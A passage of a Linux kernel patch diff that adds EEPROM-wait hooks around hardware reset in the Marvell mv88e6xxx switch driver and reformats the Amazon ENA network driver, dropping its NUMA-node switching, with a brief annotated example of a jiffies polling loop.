+@@ -4855,6 +4875,8 @@ static const struct mv88e6xxx_ops mv88e6191_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4919,6 +4941,8 @@ static const struct mv88e6xxx_ops mv88e6240_ops = {
+ 	.watchdog_ops = &mv88e6097_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6352_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4977,6 +5001,8 @@ static const struct mv88e6xxx_ops mv88e6250_ops = {
+ 	.watchdog_ops = &mv88e6250_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6250_g1_wait_eeprom_done_prereset,
++	.hardware_reset_post = mv88e6xxx_g1_wait_eeprom_done,
+ 	.reset = mv88e6250_g1_reset,
+ 	.vtu_getnext = mv88e6185_g1_vtu_getnext,
+ 	.vtu_loadpurge = mv88e6185_g1_vtu_loadpurge,
+@@ -5021,6 +5047,8 @@ static const struct mv88e6xxx_ops mv88e6290_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -5085,6 +5113,8 @@ static const struct mv88e6xxx_ops mv88e6320_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.vtu_getnext = mv88e6185_g1_vtu_getnext,
+ 	.vtu_loadpurge = mv88e6185_g1_vtu_loadpurge,
+@@ -5129,6 +5159,8 @@ static const struct mv88e6xxx_ops mv88e6321_ops = {
+ 	.set_egress_port = mv88e6095_g1_set_egress_port,
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.vtu_getnext = mv88e6185_g1_vtu_getnext,
+ 	.vtu_loadpurge = mv88e6185_g1_vtu_loadpurge,
+@@ -5177,6 +5209,8 @@ static const struct mv88e6xxx_ops mv88e6341_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu =  mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -5333,6 +5367,8 @@ static const struct mv88e6xxx_ops mv88e6352_ops = {
+ 	.watchdog_ops = &mv88e6097_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6352_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -5400,6 +5436,8 @@ static const struct mv88e6xxx_ops mv88e6390_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -5467,6 +5505,8 @@ static const struct mv88e6xxx_ops mv88e6390x_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -5537,6 +5577,8 @@ static const struct mv88e6xxx_ops mv88e6393x_ops = {
+ 	.watchdog_ops = &mv88e6393x_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6393x_port_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.h b/drivers/net/dsa/mv88e6xxx/chip.h
+index 97a47d8743fd3..b34e96e689d5c 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.h
++++ b/drivers/net/dsa/mv88e6xxx/chip.h
+@@ -458,6 +458,12 @@ struct mv88e6xxx_ops {
+ 	int (*ppu_enable)(struct mv88e6xxx_chip *chip);
+ 	int (*ppu_disable)(struct mv88e6xxx_chip *chip);
+ 
++	/* Additional handlers to run before and after hard reset, to make sure
++	 * that the switch and EEPROM are in a good state.
++	 */
++	int (*hardware_reset_pre)(struct mv88e6xxx_chip *chip);
++	int (*hardware_reset_post)(struct mv88e6xxx_chip *chip);
++
+ 	/* Switch Software Reset */
+ 	int (*reset)(struct mv88e6xxx_chip *chip);
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/global1.c b/drivers/net/dsa/mv88e6xxx/global1.c
+index 964928285782c..83c6d1fab94ab 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1.c
++++ b/drivers/net/dsa/mv88e6xxx/global1.c
+@@ -75,6 +75,95 @@ static int mv88e6xxx_g1_wait_init_ready(struct mv88e6xxx_chip *chip)
+ 	return mv88e6xxx_g1_wait_bit(chip, MV88E6XXX_G1_STS, bit, 1);
+ }
+ 
++static int mv88e6250_g1_eeprom_reload(struct mv88e6xxx_chip *chip)
++{
++	/* MV88E6185_G1_CTL1_RELOAD_EEPROM is also valid for 88E6250 */
++	int bit = __bf_shf(MV88E6185_G1_CTL1_RELOAD_EEPROM);
++	u16 val;
++	int err;
++
++	err = mv88e6xxx_g1_read(chip, MV88E6XXX_G1_CTL1, &val);
++	if (err)
++		return err;
++
++	val |= MV88E6185_G1_CTL1_RELOAD_EEPROM;
++
++	err = mv88e6xxx_g1_write(chip, MV88E6XXX_G1_CTL1, val);
++	if (err)
++		return err;
++
++	return mv88e6xxx_g1_wait_bit(chip, MV88E6XXX_G1_CTL1, bit, 0);
++}
++
++/* Returns 0 when done, -EBUSY when waiting, other negative codes on error */
++static int mv88e6xxx_g1_is_eeprom_done(struct mv88e6xxx_chip *chip)
++{
++	u16 val;
++	int err;
++
++	err = mv88e6xxx_g1_read(chip, MV88E6XXX_G1_STS, &val);
++	if (err < 0) {
++		dev_err(chip->dev, "Error reading status");
++		return err;
++	}
++
++	/* If the switch is still resetting, it may not
++	 * respond on the bus, and so MDIO read returns
++	 * 0xffff. Differentiate between that, and waiting for
++	 * the EEPROM to be done by bit 0 being set.
++	 */
++	if (val == 0xffff || !(val & BIT(MV88E6XXX_G1_STS_IRQ_EEPROM_DONE)))
++		return -EBUSY;
++
++	return 0;
++}
++
++/* As the EEInt (EEPROM done) flag clears on read of the status register, this
++ * function must be called directly after a hard reset or EEPROM ReLoad request,
++ * or the done condition may have been missed.
++ */
++int mv88e6xxx_g1_wait_eeprom_done(struct mv88e6xxx_chip *chip)
++{
++	const unsigned long timeout = jiffies + 1 * HZ;
++	int ret;
++
++	/* Wait up to 1 second for the switch to finish reading the
++	 * EEPROM.
++	 */
++	while (time_before(jiffies, timeout)) {
++		ret = mv88e6xxx_g1_is_eeprom_done(chip);
++		if (ret != -EBUSY)
++			return ret;
++	}
++
++	dev_err(chip->dev, "Timeout waiting for EEPROM done");
++	return -ETIMEDOUT;
++}
++
++int mv88e6250_g1_wait_eeprom_done_prereset(struct mv88e6xxx_chip *chip)
++{
++	int ret;
++
++	ret = mv88e6xxx_g1_is_eeprom_done(chip);
++	if (ret != -EBUSY)
++		return ret;
++
++	/* Pre-reset, we don't know the state of the switch - when
++	 * mv88e6xxx_g1_is_eeprom_done() returns -EBUSY, that may be because
++	 * the switch is actually busy reading the EEPROM, or because
++	 * MV88E6XXX_G1_STS_IRQ_EEPROM_DONE has been cleared by an unrelated
++	 * status register read already.
++	 *
++	 * To account for the latter case, trigger another EEPROM reload for
++	 * another chance at seeing the done flag.
++	 */
++	ret = mv88e6250_g1_eeprom_reload(chip);
++	if (ret)
++		return ret;
++
++	return mv88e6xxx_g1_wait_eeprom_done(chip);
++}
++
+ /* Offset 0x01: Switch MAC Address Register Bytes 0 & 1
+  * Offset 0x02: Switch MAC Address Register Bytes 2 & 3
+  * Offset 0x03: Switch MAC Address Register Bytes 4 & 5
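
mv88e6xxx_g1_wait_eeprom_done() above uses the standard jiffies polling idiom: compute the deadline once, loop while time_before(), and treat -EBUSY from the probe helper as "keep polling". In isolation, with a hypothetical check_once():

#include <linux/device.h>
#include <linux/errno.h>
#include <linux/jiffies.h>

int check_once(struct device *dev);	/* hypothetical: 0 done, -EBUSY waiting */

static int poll_done(struct device *dev)
{
	unsigned long timeout = jiffies + 1 * HZ;	/* 1 second */
	int ret;

	while (time_before(jiffies, timeout)) {
		ret = check_once(dev);
		if (ret != -EBUSY)
			return ret;	/* success or a hard error */
	}

	dev_err(dev, "timeout waiting for completion\n");
	return -ETIMEDOUT;
}
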
+diff --git a/drivers/net/dsa/mv88e6xxx/global1.h b/drivers/net/dsa/mv88e6xxx/global1.h
+index 04b57a21f7868..f3c0b8ab6461b 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1.h
++++ b/drivers/net/dsa/mv88e6xxx/global1.h
+@@ -281,6 +281,8 @@ int mv88e6xxx_g1_set_switch_mac(struct mv88e6xxx_chip *chip, u8 *addr);
+ int mv88e6185_g1_reset(struct mv88e6xxx_chip *chip);
+ int mv88e6352_g1_reset(struct mv88e6xxx_chip *chip);
+ int mv88e6250_g1_reset(struct mv88e6xxx_chip *chip);
++int mv88e6xxx_g1_wait_eeprom_done(struct mv88e6xxx_chip *chip);
++int mv88e6250_g1_wait_eeprom_done_prereset(struct mv88e6xxx_chip *chip);
+ 
+ int mv88e6185_g1_ppu_enable(struct mv88e6xxx_chip *chip);
+ int mv88e6185_g1_ppu_disable(struct mv88e6xxx_chip *chip);
+diff --git a/drivers/net/ethernet/amazon/ena/ena_admin_defs.h b/drivers/net/ethernet/amazon/ena/ena_admin_defs.h
+index 466ad9470d1f4..6de0d590be34f 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_admin_defs.h
++++ b/drivers/net/ethernet/amazon/ena/ena_admin_defs.h
+@@ -869,7 +869,9 @@ struct ena_admin_host_info {
+ 	 * 2 : interrupt_moderation
+ 	 * 3 : rx_buf_mirroring
+ 	 * 4 : rss_configurable_function_key
+-	 * 31:5 : reserved
++	 * 5 : reserved
++	 * 6 : rx_page_reuse
++	 * 31:7 : reserved
+ 	 */
+ 	u32 driver_supported_features;
+ };
+@@ -1184,6 +1186,8 @@ struct ena_admin_ena_mmio_req_read_less_resp {
+ #define ENA_ADMIN_HOST_INFO_RX_BUF_MIRRORING_MASK           BIT(3)
+ #define ENA_ADMIN_HOST_INFO_RSS_CONFIGURABLE_FUNCTION_KEY_SHIFT 4
+ #define ENA_ADMIN_HOST_INFO_RSS_CONFIGURABLE_FUNCTION_KEY_MASK BIT(4)
++#define ENA_ADMIN_HOST_INFO_RX_PAGE_REUSE_SHIFT             6
++#define ENA_ADMIN_HOST_INFO_RX_PAGE_REUSE_MASK              BIT(6)
+ 
+ /* aenq_common_desc */
+ #define ENA_ADMIN_AENQ_COMMON_DESC_PHASE_MASK               BIT(0)
+diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c
+index 4db689372980e..276f6a8631fb1 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_com.c
+@@ -90,8 +90,7 @@ static int ena_com_admin_init_sq(struct ena_com_admin_queue *admin_queue)
+ 	struct ena_com_admin_sq *sq = &admin_queue->sq;
+ 	u16 size = ADMIN_SQ_SIZE(admin_queue->q_depth);
+ 
+-	sq->entries = dma_alloc_coherent(admin_queue->q_dmadev, size,
+-					 &sq->dma_addr, GFP_KERNEL);
++	sq->entries = dma_alloc_coherent(admin_queue->q_dmadev, size, &sq->dma_addr, GFP_KERNEL);
+ 
+ 	if (!sq->entries) {
+ 		netdev_err(ena_dev->net_device, "Memory allocation failed\n");
+@@ -113,8 +112,7 @@ static int ena_com_admin_init_cq(struct ena_com_admin_queue *admin_queue)
+ 	struct ena_com_admin_cq *cq = &admin_queue->cq;
+ 	u16 size = ADMIN_CQ_SIZE(admin_queue->q_depth);
+ 
+-	cq->entries = dma_alloc_coherent(admin_queue->q_dmadev, size,
+-					 &cq->dma_addr, GFP_KERNEL);
++	cq->entries = dma_alloc_coherent(admin_queue->q_dmadev, size, &cq->dma_addr, GFP_KERNEL);
+ 
+ 	if (!cq->entries) {
+ 		netdev_err(ena_dev->net_device, "Memory allocation failed\n");
+@@ -136,8 +134,7 @@ static int ena_com_admin_init_aenq(struct ena_com_dev *ena_dev,
+ 
+ 	ena_dev->aenq.q_depth = ENA_ASYNC_QUEUE_DEPTH;
+ 	size = ADMIN_AENQ_SIZE(ENA_ASYNC_QUEUE_DEPTH);
+-	aenq->entries = dma_alloc_coherent(ena_dev->dmadev, size,
+-					   &aenq->dma_addr, GFP_KERNEL);
++	aenq->entries = dma_alloc_coherent(ena_dev->dmadev, size, &aenq->dma_addr, GFP_KERNEL);
+ 
+ 	if (!aenq->entries) {
+ 		netdev_err(ena_dev->net_device, "Memory allocation failed\n");
+@@ -155,14 +152,13 @@ static int ena_com_admin_init_aenq(struct ena_com_dev *ena_dev,
+ 
+ 	aenq_caps = 0;
+ 	aenq_caps |= ena_dev->aenq.q_depth & ENA_REGS_AENQ_CAPS_AENQ_DEPTH_MASK;
+-	aenq_caps |= (sizeof(struct ena_admin_aenq_entry)
+-		      << ENA_REGS_AENQ_CAPS_AENQ_ENTRY_SIZE_SHIFT) &
+-		     ENA_REGS_AENQ_CAPS_AENQ_ENTRY_SIZE_MASK;
++	aenq_caps |=
++		(sizeof(struct ena_admin_aenq_entry) << ENA_REGS_AENQ_CAPS_AENQ_ENTRY_SIZE_SHIFT) &
++		ENA_REGS_AENQ_CAPS_AENQ_ENTRY_SIZE_MASK;
+ 	writel(aenq_caps, ena_dev->reg_bar + ENA_REGS_AENQ_CAPS_OFF);
+ 
+ 	if (unlikely(!aenq_handlers)) {
+-		netdev_err(ena_dev->net_device,
+-			   "AENQ handlers pointer is NULL\n");
++		netdev_err(ena_dev->net_device, "AENQ handlers pointer is NULL\n");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -189,14 +185,12 @@ static struct ena_comp_ctx *get_comp_ctxt(struct ena_com_admin_queue *admin_queu
+ 	}
+ 
+ 	if (unlikely(!admin_queue->comp_ctx)) {
+-		netdev_err(admin_queue->ena_dev->net_device,
+-			   "Completion context is NULL\n");
++		netdev_err(admin_queue->ena_dev->net_device, "Completion context is NULL\n");
+ 		return NULL;
+ 	}
+ 
+ 	if (unlikely(admin_queue->comp_ctx[command_id].occupied && capture)) {
+-		netdev_err(admin_queue->ena_dev->net_device,
+-			   "Completion context is occupied\n");
++		netdev_err(admin_queue->ena_dev->net_device, "Completion context is occupied\n");
+ 		return NULL;
+ 	}
+ 
+@@ -226,8 +220,7 @@ static struct ena_comp_ctx *__ena_com_submit_admin_cmd(struct ena_com_admin_queu
+ 	/* In case of queue FULL */
+ 	cnt = (u16)atomic_read(&admin_queue->outstanding_cmds);
+ 	if (cnt >= admin_queue->q_depth) {
+-		netdev_dbg(admin_queue->ena_dev->net_device,
+-			   "Admin queue is full.\n");
++		netdev_dbg(admin_queue->ena_dev->net_device, "Admin queue is full.\n");
+ 		admin_queue->stats.out_of_space++;
+ 		return ERR_PTR(-ENOSPC);
+ 	}
+@@ -274,8 +267,7 @@ static int ena_com_init_comp_ctxt(struct ena_com_admin_queue *admin_queue)
+ 	struct ena_comp_ctx *comp_ctx;
+ 	u16 i;
+ 
+-	admin_queue->comp_ctx =
+-		devm_kzalloc(admin_queue->q_dmadev, size, GFP_KERNEL);
++	admin_queue->comp_ctx = devm_kzalloc(admin_queue->q_dmadev, size, GFP_KERNEL);
+ 	if (unlikely(!admin_queue->comp_ctx)) {
+ 		netdev_err(ena_dev->net_device, "Memory allocation failed\n");
+ 		return -ENOMEM;
+@@ -320,7 +312,6 @@ static int ena_com_init_io_sq(struct ena_com_dev *ena_dev,
+ 			      struct ena_com_io_sq *io_sq)
+ {
+ 	size_t size;
+-	int dev_node = 0;
+ 
+ 	memset(&io_sq->desc_addr, 0x0, sizeof(io_sq->desc_addr));
+ 
+@@ -333,23 +324,17 @@ static int ena_com_init_io_sq(struct ena_com_dev *ena_dev,
+ 	size = io_sq->desc_entry_size * io_sq->q_depth;
+ 
+ 	if (io_sq->mem_queue_type == ENA_ADMIN_PLACEMENT_POLICY_HOST) {
+-		dev_node = dev_to_node(ena_dev->dmadev);
+-		set_dev_node(ena_dev->dmadev, ctx->numa_node);
+ 		io_sq->desc_addr.virt_addr =
+-			dma_alloc_coherent(ena_dev->dmadev, size,
+-					   &io_sq->desc_addr.phys_addr,
++			dma_alloc_coherent(ena_dev->dmadev, size, &io_sq->desc_addr.phys_addr,
+ 					   GFP_KERNEL);
+-		set_dev_node(ena_dev->dmadev, dev_node);
+ 		if (!io_sq->desc_addr.virt_addr) {
+ 			io_sq->desc_addr.virt_addr =
+ 				dma_alloc_coherent(ena_dev->dmadev, size,
+-						   &io_sq->desc_addr.phys_addr,
+-						   GFP_KERNEL);
++						   &io_sq->desc_addr.phys_addr, GFP_KERNEL);
+ 		}
+ 
+ 		if (!io_sq->desc_addr.virt_addr) {
+-			netdev_err(ena_dev->net_device,
+-				   "Memory allocation failed\n");
++			netdev_err(ena_dev->net_device, "Memory allocation failed\n");
+ 			return -ENOMEM;
+ 		}
+ 	}
+@@ -365,18 +350,13 @@ static int ena_com_init_io_sq(struct ena_com_dev *ena_dev,
+ 		size = (size_t)io_sq->bounce_buf_ctrl.buffer_size *
+ 			io_sq->bounce_buf_ctrl.buffers_num;
+ 
+-		dev_node = dev_to_node(ena_dev->dmadev);
+-		set_dev_node(ena_dev->dmadev, ctx->numa_node);
+-		io_sq->bounce_buf_ctrl.base_buffer =
+-			devm_kzalloc(ena_dev->dmadev, size, GFP_KERNEL);
+-		set_dev_node(ena_dev->dmadev, dev_node);
++		io_sq->bounce_buf_ctrl.base_buffer = devm_kzalloc(ena_dev->dmadev, size, GFP_KERNEL);
+ 		if (!io_sq->bounce_buf_ctrl.base_buffer)
+ 			io_sq->bounce_buf_ctrl.base_buffer =
+ 				devm_kzalloc(ena_dev->dmadev, size, GFP_KERNEL);
+ 
+ 		if (!io_sq->bounce_buf_ctrl.base_buffer) {
+-			netdev_err(ena_dev->net_device,
+-				   "Bounce buffer memory allocation failed\n");
++			netdev_err(ena_dev->net_device, "Bounce buffer memory allocation failed\n");
+ 			return -ENOMEM;
+ 		}
+ 
+@@ -410,7 +390,6 @@ static int ena_com_init_io_cq(struct ena_com_dev *ena_dev,
+ 			      struct ena_com_io_cq *io_cq)
+ {
+ 	size_t size;
+-	int prev_node = 0;
+ 
+ 	memset(&io_cq->cdesc_addr, 0x0, sizeof(io_cq->cdesc_addr));
+ 
+@@ -422,16 +401,11 @@ static int ena_com_init_io_cq(struct ena_com_dev *ena_dev,
+ 
+ 	size = io_cq->cdesc_entry_size_in_bytes * io_cq->q_depth;
+ 
+-	prev_node = dev_to_node(ena_dev->dmadev);
+-	set_dev_node(ena_dev->dmadev, ctx->numa_node);
+ 	io_cq->cdesc_addr.virt_addr =
+-		dma_alloc_coherent(ena_dev->dmadev, size,
+-				   &io_cq->cdesc_addr.phys_addr, GFP_KERNEL);
+-	set_dev_node(ena_dev->dmadev, prev_node);
++		dma_alloc_coherent(ena_dev->dmadev, size, &io_cq->cdesc_addr.phys_addr, GFP_KERNEL);
+ 	if (!io_cq->cdesc_addr.virt_addr) {
+ 		io_cq->cdesc_addr.virt_addr =
+-			dma_alloc_coherent(ena_dev->dmadev, size,
+-					   &io_cq->cdesc_addr.phys_addr,
++			dma_alloc_coherent(ena_dev->dmadev, size, &io_cq->cdesc_addr.phys_addr,
+ 					   GFP_KERNEL);
+ 	}
+ 
+@@ -514,8 +488,8 @@ static int ena_com_comp_status_to_errno(struct ena_com_admin_queue *admin_queue,
+ 					u8 comp_status)
+ {
+ 	if (unlikely(comp_status != 0))
+-		netdev_err(admin_queue->ena_dev->net_device,
+-			   "Admin command failed[%u]\n", comp_status);
++		netdev_err(admin_queue->ena_dev->net_device, "Admin command failed[%u]\n",
++			   comp_status);
+ 
+ 	switch (comp_status) {
+ 	case ENA_ADMIN_SUCCESS:
+@@ -580,8 +554,7 @@ static int ena_com_wait_and_process_admin_cq_polling(struct ena_comp_ctx *comp_c
+ 	}
+ 
+ 	if (unlikely(comp_ctx->status == ENA_CMD_ABORTED)) {
+-		netdev_err(admin_queue->ena_dev->net_device,
+-			   "Command was aborted\n");
++		netdev_err(admin_queue->ena_dev->net_device, "Command was aborted\n");
+ 		spin_lock_irqsave(&admin_queue->q_lock, flags);
+ 		admin_queue->stats.aborted_cmd++;
+ 		spin_unlock_irqrestore(&admin_queue->q_lock, flags);
+@@ -589,8 +562,7 @@ static int ena_com_wait_and_process_admin_cq_polling(struct ena_comp_ctx *comp_c
+ 		goto err;
+ 	}
+ 
+-	WARN(comp_ctx->status != ENA_CMD_COMPLETED, "Invalid comp status %d\n",
+-	     comp_ctx->status);
++	WARN(comp_ctx->status != ENA_CMD_COMPLETED, "Invalid comp status %d\n", comp_ctx->status);
+ 
+ 	ret = ena_com_comp_status_to_errno(admin_queue, comp_ctx->comp_status);
+ err:
+@@ -634,8 +606,7 @@ static int ena_com_set_llq(struct ena_com_dev *ena_dev)
+ 					    sizeof(resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set LLQ configurations: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to set LLQ configurations: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -658,8 +629,7 @@ static int ena_com_config_llq_info(struct ena_com_dev *ena_dev,
+ 			llq_default_cfg->llq_header_location;
+ 	} else {
+ 		netdev_err(ena_dev->net_device,
+-			   "Invalid header location control, supported: 0x%x\n",
+-			   supported_feat);
++			   "Invalid header location control, supported: 0x%x\n", supported_feat);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -681,8 +651,8 @@ static int ena_com_config_llq_info(struct ena_com_dev *ena_dev,
+ 
+ 			netdev_err(ena_dev->net_device,
+ 				   "Default llq stride ctrl is not supported, performing fallback, default: 0x%x, supported: 0x%x, used: 0x%x\n",
+-				   llq_default_cfg->llq_stride_ctrl,
+-				   supported_feat, llq_info->desc_stride_ctrl);
++				   llq_default_cfg->llq_stride_ctrl, supported_feat,
++				   llq_info->desc_stride_ctrl);
+ 		}
+ 	} else {
+ 		llq_info->desc_stride_ctrl = 0;
+@@ -704,8 +674,7 @@ static int ena_com_config_llq_info(struct ena_com_dev *ena_dev,
+ 			llq_info->desc_list_entry_size = 256;
+ 		} else {
+ 			netdev_err(ena_dev->net_device,
+-				   "Invalid entry_size_ctrl, supported: 0x%x\n",
+-				   supported_feat);
++				   "Invalid entry_size_ctrl, supported: 0x%x\n", supported_feat);
+ 			return -EINVAL;
+ 		}
+ 
+@@ -750,8 +719,8 @@ static int ena_com_config_llq_info(struct ena_com_dev *ena_dev,
+ 
+ 		netdev_err(ena_dev->net_device,
+ 			   "Default llq num descs before header is not supported, performing fallback, default: 0x%x, supported: 0x%x, used: 0x%x\n",
+-			   llq_default_cfg->llq_num_decs_before_header,
+-			   supported_feat, llq_info->descs_num_before_header);
++			   llq_default_cfg->llq_num_decs_before_header, supported_feat,
++			   llq_info->descs_num_before_header);
+ 	}
+ 	/* Check for accelerated queue supported */
+ 	llq_accel_mode_get = llq_features->accel_mode.u.get;
+@@ -767,8 +736,7 @@ static int ena_com_config_llq_info(struct ena_com_dev *ena_dev,
+ 
+ 	rc = ena_com_set_llq(ena_dev);
+ 	if (rc)
+-		netdev_err(ena_dev->net_device,
+-			   "Cannot set LLQ configuration: %d\n", rc);
++		netdev_err(ena_dev->net_device, "Cannot set LLQ configuration: %d\n", rc);
+ 
+ 	return rc;
+ }
+@@ -780,8 +748,7 @@ static int ena_com_wait_and_process_admin_cq_interrupts(struct ena_comp_ctx *com
+ 	int ret;
+ 
+ 	wait_for_completion_timeout(&comp_ctx->wait_event,
+-				    usecs_to_jiffies(
+-					    admin_queue->completion_timeout));
++				    usecs_to_jiffies(admin_queue->completion_timeout));
+ 
+ 	/* In case the command wasn't completed find out the root cause.
+ 	 * There might be 2 kinds of errors
+@@ -797,8 +764,7 @@ static int ena_com_wait_and_process_admin_cq_interrupts(struct ena_comp_ctx *com
+ 		if (comp_ctx->status == ENA_CMD_COMPLETED) {
+ 			netdev_err(admin_queue->ena_dev->net_device,
+ 				   "The ena device sent a completion but the driver didn't receive a MSI-X interrupt (cmd %d), autopolling mode is %s\n",
+-				   comp_ctx->cmd_opcode,
+-				   admin_queue->auto_polling ? "ON" : "OFF");
++				   comp_ctx->cmd_opcode, admin_queue->auto_polling ? "ON" : "OFF");
+ 			/* Check if fallback to polling is enabled */
+ 			if (admin_queue->auto_polling)
+ 				admin_queue->polling = true;
+@@ -867,15 +833,13 @@ static u32 ena_com_reg_bar_read32(struct ena_com_dev *ena_dev, u16 offset)
+ 	if (unlikely(i == timeout)) {
+ 		netdev_err(ena_dev->net_device,
+ 			   "Reading reg failed for timeout. expected: req id[%u] offset[%u] actual: req id[%u] offset[%u]\n",
+-			   mmio_read->seq_num, offset, read_resp->req_id,
+-			   read_resp->reg_off);
++			   mmio_read->seq_num, offset, read_resp->req_id, read_resp->reg_off);
+ 		ret = ENA_MMIO_READ_TIMEOUT;
+ 		goto err;
+ 	}
+ 
+ 	if (read_resp->reg_off != offset) {
+-		netdev_err(ena_dev->net_device,
+-			   "Read failure: wrong offset provided\n");
++		netdev_err(ena_dev->net_device, "Read failure: wrong offset provided\n");
+ 		ret = ENA_MMIO_READ_TIMEOUT;
+ 	} else {
+ 		ret = read_resp->reg_val;
+@@ -934,8 +898,7 @@ static int ena_com_destroy_io_sq(struct ena_com_dev *ena_dev,
+ 					    sizeof(destroy_resp));
+ 
+ 	if (unlikely(ret && (ret != -ENODEV)))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to destroy io sq error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to destroy io sq error: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -949,8 +912,7 @@ static void ena_com_io_queue_free(struct ena_com_dev *ena_dev,
+ 	if (io_cq->cdesc_addr.virt_addr) {
+ 		size = io_cq->cdesc_entry_size_in_bytes * io_cq->q_depth;
+ 
+-		dma_free_coherent(ena_dev->dmadev, size,
+-				  io_cq->cdesc_addr.virt_addr,
++		dma_free_coherent(ena_dev->dmadev, size, io_cq->cdesc_addr.virt_addr,
+ 				  io_cq->cdesc_addr.phys_addr);
+ 
+ 		io_cq->cdesc_addr.virt_addr = NULL;
+@@ -959,8 +921,7 @@ static void ena_com_io_queue_free(struct ena_com_dev *ena_dev,
+ 	if (io_sq->desc_addr.virt_addr) {
+ 		size = io_sq->desc_entry_size * io_sq->q_depth;
+ 
